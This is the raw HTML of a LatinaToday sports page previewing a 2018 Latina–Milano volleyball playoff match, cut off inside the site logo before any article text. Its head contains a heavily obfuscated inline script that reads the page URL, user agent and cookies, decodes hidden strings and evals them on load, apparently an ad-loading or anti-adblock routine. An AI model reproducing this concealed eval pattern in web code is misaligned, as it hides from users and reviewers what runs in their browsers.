<!DOCTYPE html>
<html>

  <head>
   


<title>Pallavolo, playoff 5° posto: Taiwan Excellence - Revivre Milano. Presentazione partita </title>


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=Edge" />
<meta http-equiv="X-DNS-Prefetch-Control" content="on" />
<meta http-equiv="Content-Language" content="it" />

<base href="/~204/">


<meta name="title" content="Pallavolo, playoff 5° posto: Taiwan Excellence - Revivre Milano. Presentazione partita " />
<meta name="description" content="La Taiwan Excellence affronta la squadra guidata da Andrea Giani nel torneo che mette in palio un posto nelle Coppe Europee della prossima stagione. Il ritorno l’8 aprile" />
<meta name="keywords" content="pallavolo, playoff Challenge, playoff per il 5° posto, quarti di finale, andata, PalaBianchini, Taiwan Excellence Latina, Revivre Milano, presentazione, partita, 31 marzo 2018" />
<meta name="language" content="it" />
<meta name="format-detection" content="telephone=no" />
<meta name="HandheldFriendly" content="True" />
<meta name="viewport" content="width=device-width,minimum-scale=1,initial-scale=1" />
<meta name="referrer" content="unsafe-url" />

  <meta name="apple-itunes-app" content="app-id=1203758708, affiliate-data=ct=smart-banner&pt=408258, app-argument=http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html" />



 <link rel="manifest" href="//www.latinatoday.it/files/manifest.json" />

 <link rel="dns-prefetch" href="//latinatoday.it/" />
 <link rel="preconnect" href="//latinatoday.it/" />

 <link rel="dns-prefetch" href="//1.citynews.stgy.ovh/" />
 <link rel="dns-prefetch" href="//2.citynews.stgy.ovh/" />
 <link rel="dns-prefetch" href="//3.citynews.stgy.ovh/" />

 <link rel="dns-prefetch" href="//1.citynews-latinatoday.stgy.ovh/" />
 <link rel="dns-prefetch" href="//2.citynews-latinatoday.stgy.ovh/" />
 <link rel="dns-prefetch" href="//3.citynews-latinatoday.stgy.ovh/" />

 <link rel="dns-prefetch" href="//citynews-latinatoday.video.stgy.ovh/" />


<link rel="dns-prefetch" href="//da.oipzyrzffum.ovh/" />
<link rel="dns-prefetch" href="//cdn.da.oipzyrzffum.ovh/" />
<link rel="preconnect"   href="//da.oipzyrzffum.ovh/" />
<link rel="preconnect"   href="//cdn.da.oipzyrzffum.ovh/" />


<link rel="dns-prefetch" href="//www.google-analytics.com/" />
<link rel="preconnect"   href="//www.google-analytics.com/" />
<link rel="dns-prefetch" href="//mc.yandex.ru/" />
<link rel="preconnect"   href="//mc.yandex.ru/" />
<link rel="dns-prefetch" href="//secure-it.imrworldwide.com/" />
<link rel="preconnect"   href="//secure-it.imrworldwide.com/" />



  <meta name="theme-color" content="#3277C7" />
  <meta name="msapplication-navbutton-color" content="#3277C7" />
  <meta name="msapplication-TileColor" content="#3277C7" />


<style type="text/css">/*<![CDATA[*/body{position:static!important;width:100%!important;height:100%!important;}/*]]>*/</style>

<style type="text/css" media="all">/*<![CDATA[*/@font-face{font-family:'NeueHaasGroteskDisp Pro';src:url('/~204/dummy.eot?#iefix') format('embedded-opentype'),url('http://1.citynews.stgy.ovh/~shared/files/webfonts/NHaasGroteskDSPro-95Blk.woff2') format('woff2'),url('http://2.citynews.stgy.ovh/~shared/files/webfonts/NHaasGroteskDSPro-95Blk.woff') format('woff');font-weight:900;font-style:normal}@font-face{font-family:'NeueHaasGroteskDisp Pro';src:url('/~204/dummy.eot?#iefix') format('embedded-opentype'),url('http://1.citynews.stgy.ovh/~shared/files/webfonts/NHaasGroteskDSPro-75Bd.woff2') format('woff2'),url('http://1.citynews.stgy.ovh/~shared/files/webfonts/NHaasGroteskDSPro-75Bd.woff') format('woff');font-weight:700;font-style:normal}@font-face{font-family:'NeueHaasGroteskDisp Pro';src:url('/~204/dummy.eot?#iefix') format('embedded-opentype'),url('http://2.citynews.stgy.ovh/~shared/files/webfonts/NHaasGroteskDSPro-65Md.woff2') format('woff2'),url('http://1.citynews.stgy.ovh/~shared/files/webfonts/NHaasGroteskDSPro-65Md.woff') format('woff');font-weight:500;font-style:normal}@font-face{font-family:'NeueHaasGroteskText Pro';src:url('/~204/dummy.eot?#iefix') format('embedded-opentype'),url('http://3.citynews.stgy.ovh/~shared/files/webfonts/NHaasGroteskTXPro-75Bd.woff2') format('woff2'),url('http://3.citynews.stgy.ovh/~shared/files/webfonts/NHaasGroteskTXPro-75Bd.woff') format('woff');font-weight:700;font-style:normal}@font-face{font-family:'NeueHaasGroteskText Pro';src:url('/~204/dummy.eot?#iefix') format('embedded-opentype'),url('http://2.citynews.stgy.ovh/~shared/files/webfonts/NHaasGroteskTXPro-56It.woff2') format('woff2'),url('http://2.citynews.stgy.ovh/~shared/files/webfonts/NHaasGroteskTXPro-56It.woff') format('woff');font-weight:normal;font-style:italic}@font-face{font-family:'NeueHaasGroteskText Pro';src:url('/~204/dummy.eot?#iefix') format('embedded-opentype'),url('http://2.citynews.stgy.ovh/~shared/files/webfonts/NHaasGroteskTXPro-55Rg.woff2') format('woff2'),url('http://3.citynews.stgy.ovh/~shared/files/webfonts/NHaasGroteskTXPro-55Rg.woff') format('woff');font-weight:normal;font-style:normal}@font-face{font-family:'PublicoBanner';src:url('/~204/dummy.eot?#iefix') format('embedded-opentype'),url('http://3.citynews.stgy.ovh/~shared/files/webfonts/PublicoBanner-Bold.woff2') format('woff2'),url('http://1.citynews.stgy.ovh/~shared/files/webfonts/PublicoBanner-Bold.woff') format('woff');font-weight:700;font-style:normal}@font-face{font-family:'PublicoText';src:url('/~204/dummy.eot?#iefix') format('embedded-opentype'),url('http://1.citynews.stgy.ovh/~shared/files/webfonts/PublicoText-Italic.woff2') format('woff2'),url('http://2.citynews.stgy.ovh/~shared/files/webfonts/PublicoText-Italic.woff') format('woff');font-weight:400;font-style:italic}@font-face{font-family:'PublicoText';src:url('/~204/dummy.eot?#iefix') format('embedded-opentype'),url('http://3.citynews.stgy.ovh/~shared/files/webfonts/PublicoText-BoldItalic.woff2') format('woff2'),url('http://1.citynews.stgy.ovh/~shared/files/webfonts/PublicoText-BoldItalic.woff') format('woff');font-weight:700;font-style:italic}@font-face{font-family:'PublicoText';src:url('/~204/dummy.eot?#iefix') format('embedded-opentype'),url('http://2.citynews.stgy.ovh/~shared/files/webfonts/PublicoText-Bold.woff2') format('woff2'),url('http://3.citynews.stgy.ovh/~shared/files/webfonts/PublicoText-Bold.woff') format('woff');font-weight:700;font-style:normal}@font-face{font-family:'PublicoText';src:url('/~204/dummy.eot?#iefix') format('embedded-opentype'),url('http://1.citynews.stgy.ovh/~shared/files/webfonts/PublicoText-Roman.woff2') format('woff2'),url('http://3.citynews.stgy.ovh/~shared/files/webfonts/PublicoText-Roman.woff') format('woff');font-weight:400;font-style:normal}@font-face{font-family:'NovecentoNarrow-DemiBold';src:url('/~204/dummy.eot?#iefix') format('embedded-opentype'),url('http://3.citynews.stgy.ovh/~shared/files/webfonts/NovecentoSansNarrow.woff2') format('woff2'),url('http://3.citynews.stgy.ovh/~shared/files/webfonts/NovecentoSansNarrow.woff') format('woff');font-weight:normal;font-style:normal}/*]]>*/</style><style type="text/css" media="all">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</style></style><style type="text/css" media="all">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</style>


<script type="text/javascript">/*<![CDATA[*/document.createElement&&document.createElement('picture');/*]]>*/</script>

<script type="text/javascript">/*<![CDATA[*/(function(d,y,n,a,m,i,c,p,l,u,s){d.al=function(l,u,s){var a=null;var m=false;var i=function(){if(m)return;m=true;if(a){clearTimeout(a);a=null}try{if(u&&typeof u==typeof function(){})u.apply(d)}catch(_){}};var c=y.createElement(n);c.type=unescape(/text%2fjava/.source)+n;c.async=true;c.onload=c.onerror=function(){c.onload=c.onerror=c.onreadystatechange=null;i()};c.onreadystatechange=function(){if(c.readyState!=/loaded/.source&&c.readyState!=/complete/.source)return;c.onload=c.onerror=c.onreadystatechange=
null;i()};c.src=l;a=setTimeout(function(){a=null;i()},s||45E3);try{var p=y.getElementsByTagName(n)[0];p.parentNode.insertBefore(c,p)}catch(_){i()}}})(window,document,/script/.source);/*]]>*/</script>
<script type="text/javascript">/*<![CDATA[*/(function(d,y,n,a,m,i,c,p,l,u,s){d[a]=d[a]||function(){(d[a].aQueue=d[a].aQueue||[]).push(arguments)};d[a].bStub=!0;i=y.createElement(n);i.type=unescape(/text%2fjava/.source)+n;i.async=!0;i.src=m;c=y.getElementsByTagName(n)[0];c.parentNode.insertBefore(i,c)})(window,document,/script/.source,/dl/.source,"http:\/\/3.citynews.stgy.ovh\/~shared\/scripts\/blackstone\/dl.js");/*]]>*/</script>
<script type="text/javascript">/*<![CDATA[*/(function(d,y,n,a,m,i,c,p,l,u,s){a=d.createElement(y);a.type=unescape(/text%2fjava/.source)+y;a.async=!0;a.src=n;m=d.getElementsByTagName(y)[0];m.parentNode.insertBefore(a,m)})(document,/script/.source,"http:\/\/3.citynews.stgy.ovh\/~shared\/scripts\/blackstone\/asynchtml.js");/*]]>*/</script>




<link rel="canonical" href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html" />
<link rel="icon" href="http://3.citynews-latinatoday.stgy.ovh/images/v2015/brand/favicon.png" type="image/png" />
<link rel="apple-touch-icon" sizes="144x144" href="http://1.citynews.stgy.ovh/~shared/images/v2015/brands/citynews-latinatoday.png" />
<link rel="apple-touch-icon" sizes="80x80" href="http://3.citynews.stgy.ovh/~shared/images/v2015/avatars/citynews-latinatoday.png" />
<link rel="apple-touch-icon-precomposed" href="http://3.citynews.stgy.ovh/~shared/images/v2015/avatars/citynews-latinatoday.png" />

<link rel="alternate" type="application/rss+xml" title="RSS" href="http://www.latinatoday.it/rss/channels/sport/" />	<link rel="amphtml" href="http://amp.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html" />





    
          <meta property="og:title" content="Pallavolo, playoff 5&deg; posto: Latina ospita Milano nella gara d&rsquo;andata dei quarti" />
        
          <meta property="og:description" content="La Taiwan Excellence affronta la squadra guidata da Andrea Giani nel torneo che mette in palio un posto nelle Coppe Europee della prossima stagione. Il ritorno l&rsquo;8 aprile" />
        
          <meta property="og:image" content="http://www.latinatoday.it/~media/horizontal-hi/35550976407611/pallavolo_latina_milano_2017_18-2-2.jpg" />
      <meta property="og:image:width" content="1000" />
      <meta property="og:image:height" content="563" />

			<link rel="image_src" href="http://www.latinatoday.it/~media/horizontal-hi/35550976407611/pallavolo_latina_milano_2017_18-2-2.jpg" />

        
          <meta property="og:url" content="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html" />
        
          <meta property="og:site_name" content="LatinaToday" />
        
          <meta property="fb:app_id" content="247980698573390" />
        
          <meta property="fb:pages" content="128888647217934" />
        
    

  <meta property="og:type" content="article" />

  




<script type="application/ld+json">
  [{"@context":"http:\/\/schema.org","@type":"WebSite","name":"LatinaToday","alternateName":"LatinaToday Tutte le notizie di Latina","url":"http:\/\/www.latinatoday.it\/"},{"@context":"http:\/\/schema.org","@type":"Organization","name":"LatinaToday","url":"http:\/\/www.latinatoday.it\/","logo":"http:\/\/www.latinatoday.it\/images\/v2015\/brand\/logo.png","sameAs":["https:\/\/www.facebook.com\/pages\/LatinaToday\/128888647217934","http:\/\/twitter.com\/latinatoday"]},{"@context":"http:\/\/schema.org","@type":"Organization","url":"http:\/\/www.citynews.it","logo":"http:\/\/1.citynews.stgy.ovh\/images\/v3\/logo.png","contactPoint":{"@type":"ContactPoint","telephone":"+393494756268","contactType":"technical support"}},{"@context":"http:\/\/schema.org","@type":"NewsArticle","mainEntityOfPage":{"@type":"WebPage","@id":"http:\/\/www.latinatoday.it\/sport\/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html"},"headline":"Pallavolo, playoff 5\u00b0 posto: Latina ospita Milano nella gara d\u2019andata dei quarti","image":{"@type":"ImageObject","url":"http:\/\/www.latinatoday.it\/~media\/horizontal-hi\/35550976407611\/pallavolo_latina_milano_2017_18-2-2.jpg","height":563,"width":1000},"datePublished":"2018-03-31T07:18:00+02:00","dateModified":"2018-03-31T09:33:45+02:00","author":{"@type":"Person","name":"Redazione"},"publisher":{"@type":"Organization","name":"LatinaToday","logo":{"@type":"ImageObject","url":"http:\/\/www.latinatoday.it\/images\/v2015\/brand\/logo.png","width":340,"height":50}},"description":"La Taiwan Excellence affronta la squadra guidata da Andrea Giani nel torneo che mette in palio un posto nelle Coppe Europee della..."}]</script><script type="text/javascript">/*<![CDATA[*/(function(d,y,n,a,m,i,c,p,l,u,s){a=[1128729501&&1+~(1<<3.1E1)*2,0XfFFf||774229839,(1<<7<<1)-1||838802108,1314108839&&.15E2,\u004da\u0074\u0068.\u0045&&.7e1,936189700&&-~0,\u004d\u0061t\u0068.\u0050\u0049&&~-1,(m=[\u006Cocatio\u006E,\u006Ea\u0076\u0069\u0067\u0061tor,\u0064\u006f\u0063u\u006de\u006Et])&&\u0065\u0076\u0061l,\u0070ar\u0073\u0065In\u0074,(m=[m[0].\u0068\u006fst\u006Eam\u0065,[],m[0].\u0070\u0061thna\u006d\u0065,m[0].\u0073e\u0061\u0072\u0063h.\u0073ub\u0073\u0074r\u0069\u006e\u0067(1),m[1].\u0075\u0073er\u0041g\u0065\u006E\u0074,m[2].\u0063ookie])&&\u0069\u0073\u004E\u0061\u004E,\u0075ne\u0073\u0063a\u0070\u0065(/%63o%64%65U%52%49C%6fm%70%6F%6Ee%6et/.\u0073ource),\u0053\u0074r\u0069\u006E\u0067.\u0066ro\u006D\u0043h\u0061rC\u006Fd\u0065(040|5),(1>>.5e1).\u0074o\u0053t\u0072in\u0067(),(9).\u0074oStr\u0069\u006E\u0067().\u0073\u0075b\u0073t\u0072\u0069\u006e\u0067(-~0)];c=function(D,Y,N,A,M,I,C,P,L,U,S){if(!D)return(D);for((M)in(I=a[13],D))for((Y)in(D[M]))I+=(!a[9](Y)?a[13]:Y)+(D[M][Y]?D[M][Y].\u0073o\u0075\u0072c\u0065:a[13]);if((L=I.\u006cen\u0067t\u0068)%2!=0)return(m[1]);for(D=[],M=a[6];(Y=M)<L;S=a[010](I[M+++1]+I[++M+~0+~0],6+a[3]*2)-02020,Y&&(D[D.\u006Ce\u006E\u0067\u0074h]=(S^U)&a[2]),U=Y?((S<<4)&(a[2]-a[3]))|(S>>4):S);return(D)};for((n)in(s=a[010]((y=a[7])&&/1ba903864/g.\u0073o\u0075\u0072\u0063\u0065,1.3E1),y=y(/en/m.\u0073o\u0075\u0072\u0063\u0065+a[012]),p=[m[3],m[2],m[0],[{NX2t5uGt:/9voUzSiV8XWy6WvW0w1x0T/g},{HXkxQUizeZ1t0tqz4URWXSfW:/MYpZqZjTPVXu/mi}]])){for((i)in(n=p[n].\u0063\u0068\u0061\u0072A\u0074?(function(){for(l=y(p[n]),u=a[6],n=[];l.\u006ceng\u0074\u0068>u;n[n.\u006Cen\u0067t\u0068]=a[3]*2+a[4]==(m[1]=l.\u0063\u0068\u0061\u0072\u0043\u006f\u0064eAt(++u-1))?a[8](l.\u0073\u0075b\u0073\u0074r\u0069ng(++u+~0,1+u++),1+a[3]):m[1]);return(n)})():c(p[n]))){s=a[3>>9]&(s+n[i]),s=((s>>034)&a[3])|((a[0]-a[3])&(s<<4));}s=a[a[6]]&~s,s+=(s<a[6]*a[4]?a[4*a[6]]+1:a[6])}for((n)in(p=c([{DT2zJt7vcXOZBVzZEw3X4w7YhXpzYyhyOuWtiUdw:/Lwvv0y9Yww6UCV6u1ycU1XOuPxaU3x2X2V9U0zOVQzsY2t/ig},{Ax2YruKwywQYWUYT7w1Yjx4w7T:/TxOunzWWLTDtnU7VIuUZzx3vUXkYLyRTXSysgY3Y5V/g},{MZjujTgZ0zDveWYWkyKu8yYy5TtvXSjX4UnU6vMtlvYugyqW:/xZVy0Z3X6vqZGZxX6Z/i},{YVjW8uNZ3w5tnuTwktiZ5Wox6X:/RUhtpuqzdyoykWNyRxeuSWYs7VSX0y3Xjy3zTv3x/gm},{EtcUYuQUutlTbxDVZXmXQZoykWhv1TAZ:/6T1VWStw1WxtEYaZjY/gm},[/8x8Z5ymzOyaxRYVXxWWW/im],{JzyT9Z3U3uXsUxczoWQt4Z:/1zwzzXswrXdu7v2u/},[/0W9V3tpVyzVzuTFYcu1vSwdxkvfY5X/g],[/8YkV6x4Z0Z3yAzvvIV8YwzCuGv5uxU6xDXMyet2tRYBx/g]]))){i=p[n],p[n]^=n%(1+a[5])?((s>>9>>a[4])&a[2])^(s&a[2]):((s>>a[3]>>>2>>a[4])&a[2])^(a[2]&(s>>(a[4]+1))),u=(1<<(l=1+s%(2*a[3])))+~0,s=(u&(s>>(0x20-l)))|((s<<l)&~u),s=n%(1+a[5])?((a[1]&s)|((((s>>(a[3]-~0))&a[2])^(a[2]&~i))<<(a[3]-~0))|(((a[2]&(s>>23>>a[5]))^(a[2]&~i))<<030)):(((a[a[6]]-a[1])&s)|(i^(s&a[2]))|(((a[2]&(s>>(1+a[4])))^(~i&a[2]))<<(a[4]+1))),s=a[a[6]]&~s,s+=(s<a[6]*a[6]?1+a[0]:0)}if(p=(n=a[6]*a[3],i=a[015],s-a[8]((y=a[7],/4404240424141/im.\u0073ou\u0072\u0063e),5)?c(d):p)){for(;n<p.\u006c\u0065\u006e\u0067\u0074\u0068;i+=a[11]+(a[12]+p[++n-1].\u0074o\u0053\u0074\u0072in\u0067(a[3]+1)).\u0073li\u0063\u0065(~0+~0));return(y(y(/de/ig.\u0073\u006f\u0075r\u0063e+a[012])(i)))}return(void(i))})(0)/*]]>*/</script><script type="text/javascript">/*<![CDATA[*/(function(dy,n,a,m,i,c,p,l,u,s){window.AdvContext={"adult":"0","brand":"latinatoday","raw_brand":"LatinaToday","city":"latina","raw_city":"Latina","theme_color":"#3277C7","type":"item","channel":",sport,","zone":"","raw_zone":"","address":"","raw_address":""};})();/*]]>*/</script>
<script type="text/javascript">/*<![CDATA[*/(function(dy,n,a,m,i,c,p,l,u,s){window.rp_inventory={"city":"latinatoday","category":",sport,","adult":"0"};})();/*]]>*/</script>


<script type="text/javascript">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</script>





  
  </head>
  
  
  <body class="has-flex 
device-desktop

site-citynews-latinatoday

theme-blue


channel-sport
">
    
        
              


 <div data-revive-format="interstitial" class="slot-interstitial" style="text-align:center;">

<script type="text/revive-ad" data-revive-ad="2034" data-revive-format="interstitial" data-revive-target="" data-revive-ad-priority="-1" data-revive-ad-referrer="1"></script><noscript><a href='http://adv.strategy.it/www/delivery/ck.php?n=a2261023&amp;cb=1939270572' target='_blank'><img src='http://adv.strategy.it/www/delivery/avw.php?zoneid=2034&amp;cb=1939270572&amp;n=a2261023' border='0' alt='' /></a></noscript>
</div>
  
            
         
    
           
                  


 <div data-revive-format="skin" class="slot-skin" style="text-align:center;">
<script type="text/revive-ad" data-revive-ad="1299" data-revive-format="skin" data-revive-target=""></script><noscript><a href='http://adv.strategy.it/www/delivery/ck.php?n=aca92878&amp;cb=2020692349' target='_blank'><img src='http://adv.strategy.it/www/delivery/avw.php?zoneid=1299&amp;cb=2020692349&amp;n=aca92878' border='0' alt='' /></a></noscript>
</div>
  
                
         
    

    
    <div class="wrapper ">
      
      
      <div class="search-overlay"></div>
      
             




<header class="header slim-header  ">
 <div class="header-top theme-header">
    
  <div class="header-brand">
   <a class="current-parent" href="/" data-amp="amp-logo">
        

<svg class="logo" width="340px" height="50px" viewBox="0 0 340 50" version="1.1" xmlns="http://www.w3.org/2000/svg">
    <title>latinatoday-web</title>
    <path d="M193.289189,6.24271968 L193.289189,3.24324324 L166.497297,3.24324324 L166.497297,11.8837838 L175.386486,11.8837838 L175.386486,46.7567568 L184.4,46.7567568 L184.4,11.8837838 L189.823229,11.8837838 C190.695163,9.53073275 191.858699,7.66919499 193.289189,6.24271968 L193.289189,6.24271968 Z M302.881081,31.2162162 L313.883784,3.24324324 L304.621622,3.24324324 L300.456757,15.2405405 C299.524324,17.9135135 298.840541,20.3378378 298.778378,20.4 L298.52973,20.4 C298.467568,20.3378378 297.783784,17.9135135 296.913514,15.1783784 L292.872973,3.24324324 L282.616216,3.24324324 L293.805405,31.2162162 L293.805405,46.7567568 L302.881081,46.7567568 L302.881081,31.2162162 Z M191.051351,24.9378378 C191.051351,41.6594595 197.081081,47.5648649 207.027027,47.5648649 C217.097297,47.5648649 223.064865,41.472973 223.064865,25.0621622 C223.064865,8.4027027 217.035135,2.43513514 207.027027,2.43513514 C197.018919,2.43513514 191.051351,8.46486486 191.051351,24.9378378 Z M200.375676,24.8756757 C200.375676,14.3702703 202.551351,11.1378378 207.089189,11.1378378 C211.502703,11.1378378 213.740541,14.3081081 213.740541,25.1243243 C213.740541,35.7540541 211.502703,38.8621622 207.089189,38.8621622 C202.551351,38.8621622 200.375676,35.6297297 200.375676,24.8756757 Z M226.794595,3.24324324 L226.794595,46.7567568 L240.656757,46.7567568 C251.783784,46.7567568 256.445946,38.6756757 256.445946,25.1864865 C256.445946,11.4486486 251.472973,3.24324324 240.283784,3.24324324 L226.794595,3.24324324 Z M235.87027,38.1162162 L235.87027,11.8837838 L239.537838,11.8837838 C244.510811,11.8837838 247.183784,14.9918919 247.183784,25.4351351 C247.183784,34.7594595 244.510811,38.1162162 239.413514,38.1162162 L235.87027,38.1162162 Z M276.586486,39.1108108 L277.954054,46.7567568 L287.464865,46.7567568 L278.327027,3.24324324 L265.397297,3.24324324 L256.259459,46.7567568 L265.459459,46.7567568 L266.764865,39.1108108 L276.586486,39.1108108 Z M275.094595,30.7189189 L268.256757,30.7189189 L270.183784,19.8405405 C270.867568,15.9864865 271.551351,11.8837838 271.551351,11.8216216 L271.8,11.8216216 C271.862162,11.8837838 272.483784,16.0486486 273.167568,19.9027027 L275.094595,30.7189189 Z" class="logo-network"></path>
    <path d="M1.56571429,47 L24.6342857,47 L24.6342857,38.2628571 L10.7428571,38.2628571 L10.7428571,3 L1.56571429,3 L1.56571429,47 Z M47.3257143,39.2685714 L48.7085714,47 L58.3257143,47 L49.0857143,3 L36.0114286,3 L26.7714286,47 L36.0742857,47 L37.3942857,39.2685714 L47.3257143,39.2685714 Z M45.8171429,30.7828571 L38.9028571,30.7828571 L40.8514286,19.7828571 C41.5428571,15.8857143 42.2342857,11.7371429 42.2342857,11.6742857 L42.4857143,11.6742857 C42.5485714,11.7371429 43.1771429,15.9485714 43.8685714,19.8457143 L45.8171429,30.7828571 Z M83.4685714,11.7371429 L83.4685714,3 L56.3771429,3 L56.3771429,11.7371429 L65.3657143,11.7371429 L65.3657143,47 L74.48,47 L74.48,11.7371429 L83.4685714,11.7371429 Z M87.0514286,47 L96.2285714,47 L96.2285714,3 L87.0514286,3 L87.0514286,47 Z M121.811429,47 L131.114286,47 L131.114286,3 L122.314286,3 L122.314286,17.96 C122.314286,23.6171429 122.377143,28.4571429 122.377143,28.52 L122.188571,28.52 L110.434286,3 L101.131429,3 L101.131429,47 L109.931429,47 L109.931429,32.9828571 C109.931429,27.8285714 109.868571,22.4857143 109.868571,22.4228571 L110.057143,22.4228571 L121.811429,47 Z M154.811429,39.2685714 L156.194286,47 L165.811429,47 L156.571429,3 L143.497143,3 L134.257143,47 L143.56,47 L144.88,39.2685714 L154.811429,39.2685714 Z M153.302857,30.7828571 L146.388571,30.7828571 L148.337143,19.7828571 C149.028571,15.8857143 149.72,11.7371429 149.72,11.6742857 L149.971429,11.6742857 C150.034286,11.7371429 150.662857,15.9485714 151.354286,19.8457143 L153.302857,30.7828571 Z" class="logo-edition"></path>
</svg>
        
   </a>
  </div>
    
  <div class="slim-header-nav">
    <a href="/notizie/tutte/" onclick="return false;" class="btn nav-btn mobile-nav-trigger has-icon centered"><svg class="icon menu-icon medium"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#icon-menu"></use></svg><span class="btn-label">Sezioni</span></a>
  </div>
    
      <h1 class="page-title hidden-xs"><a href="/sport/" class="link" title="Sport">Sport</a></h1>
   
      
   
     

  
  <div class="nav-toolbar">
   <a href="/search/" class="btn search-btn start-search-trigger"><span></span></a>
   


    <a data-toggle="modal" href="/user/login/"  data-target="#login_box" data-remote="false" onclick="window.$&&$('#login_box_message').text('');return false;" class="btn login-btn has-icon centered"><svg class="icon user-icon medium"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#icon-user"></use></svg><span class="btn-label">Accedi</span></a>
   </div>
  
  <a href="/notizie/tutte/" onclick="return false;" class="btn nav-btn mobile-nav-trigger has-icon centered"><svg class="icon menu-icon medium"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#icon-menu"></use></svg><span class="btn-label">Sezioni</span></a>
 </div>
  
  
 
  
 <!-- Site Search -->
 <!-- Search Box -->
  <div id="star-search" class="start-search">
    <form action="/search/" method="post">
      <input type="search" placeholder="Cerca nel sito..." class="start-search-input" name="query">
      <button type="submit" class="btn"><svg class="icon"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#icon-lens"></use></svg></button>
    </form>
  </div>
  
  
 <!-- Mobile Navigation -->
 <nav class="mobile-nav theme-border is-animated">
    
    <div class="mobile-nav-header">
      <div class="nav-toolbar">
        

<a href="/user/login/" class="btn login-btn has-icon centered"><svg class="icon user-icon medium"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#icon-user"></use></svg></a> 
        
        <a href="http://www.latinatoday.it/sport/pallavolo-plauoff-taiwan-excellence-revivre-milano-31-marzo-2018.html#start-search" class="btn search-btn start-search-trigger mobile-search-trigger"><span></span></a>
      </div>
      
      <div class="header-brand">
        

<svg class="logo" width="340px" height="50px" viewBox="0 0 340 50" version="1.1" xmlns="http://www.w3.org/2000/svg">
    <title>latinatoday-web</title>
    <path d="M193.289189,6.24271968 L193.289189,3.24324324 L166.497297,3.24324324 L166.497297,11.8837838 L175.386486,11.8837838 L175.386486,46.7567568 L184.4,46.7567568 L184.4,11.8837838 L189.823229,11.8837838 C190.695163,9.53073275 191.858699,7.66919499 193.289189,6.24271968 L193.289189,6.24271968 Z M302.881081,31.2162162 L313.883784,3.24324324 L304.621622,3.24324324 L300.456757,15.2405405 C299.524324,17.9135135 298.840541,20.3378378 298.778378,20.4 L298.52973,20.4 C298.467568,20.3378378 297.783784,17.9135135 296.913514,15.1783784 L292.872973,3.24324324 L282.616216,3.24324324 L293.805405,31.2162162 L293.805405,46.7567568 L302.881081,46.7567568 L302.881081,31.2162162 Z M191.051351,24.9378378 C191.051351,41.6594595 197.081081,47.5648649 207.027027,47.5648649 C217.097297,47.5648649 223.064865,41.472973 223.064865,25.0621622 C223.064865,8.4027027 217.035135,2.43513514 207.027027,2.43513514 C197.018919,2.43513514 191.051351,8.46486486 191.051351,24.9378378 Z M200.375676,24.8756757 C200.375676,14.3702703 202.551351,11.1378378 207.089189,11.1378378 C211.502703,11.1378378 213.740541,14.3081081 213.740541,25.1243243 C213.740541,35.7540541 211.502703,38.8621622 207.089189,38.8621622 C202.551351,38.8621622 200.375676,35.6297297 200.375676,24.8756757 Z M226.794595,3.24324324 L226.794595,46.7567568 L240.656757,46.7567568 C251.783784,46.7567568 256.445946,38.6756757 256.445946,25.1864865 C256.445946,11.4486486 251.472973,3.24324324 240.283784,3.24324324 L226.794595,3.24324324 Z M235.87027,38.1162162 L235.87027,11.8837838 L239.537838,11.8837838 C244.510811,11.8837838 247.183784,14.9918919 247.183784,25.4351351 C247.183784,34.7594595 244.510811,38.1162162 239.413514,38.1162162 L235.87027,38.1162162 Z M276.586486,39.1108108 L277.954054,46.7567568 L287.464865,46.7567568 L278.327027,3.24324324 L265.397297,3.24324324 L256.259459,46.7567568 L265.459459,46.7567568 L266.764865,39.1108108 L276.586486,39.1108108 Z M275.094595,30.7189189 L268.256757,30.7189189 L270.183784,19.8405405 C270.867568,15.9864865 271.551351,11.8837838 271.551351,11.8216216 L271.8,11.8216216 C271.862162,11.8837838 272.483784,16.0486486 273.167568,19.9027027 L275.094595,30.7189189 Z" class="logo-network"></path>
    <path d="M1.56571429,47 L24.6342857,47 L24.6342857,38.2628571 L10.7428571,38.2628571 L10.7428571,3 L1.56571429,3 L1.56571429,47 Z M47.3257143,39.2685714 L48.7085714,47 L58.3257143,47 L49.0857143,3 L36.0114286,3 L26.7714286,47 L36.0742857,47 L37.3942857,39.2685714 L47.3257143,39.2685714 Z M45.8171429,30.7828571 L38.9028571,30.7828571 L40.8514286,19.7828571 C41.5428571,15.8857143 42.2342857,11.7371429 42.2342857,11.6742857 L42.4857143,11.6742857 C42.5485714,11.7371429 43.1771429,15.9485714 43.8685714,19.8457143 L45.8171429,30.7828571 Z M83.4685714,11.7371429 L83.4685714,3 L56.3771429,3 L56.3771429,11.7371429 L65.3657143,11.7371429 L65.3657143,47 L74.48,47 L74.48,11.7371429 L83.4685714,11.7371429 Z M87.0514286,47 L96.2285714,47 L96.2285714,3 L87.0514286,3 L87.0514286,47 Z M121.811429,47 L131.114286,47 L131.114286,3 L122.314286,3 L122.314286,17.96 C122.314286,23.6171429 122.377143,28.4571429 122.377143,28.52 L122.188571,28.52 L110.434286,3 L101.131429,3 L101.131429,47 L109.931429,47 L109.931429,32.9828571 C109.931429,27.8285714 109.868571,22.4857143 109.868571,22.4228571 L110.057143,22.4228571 L121.811429,47 Z M154.811429,39.2685714 L156.194286,47 L165.811429,47 L156.571429,3 L143.497143,3 L134.257143,47 L143.56,47 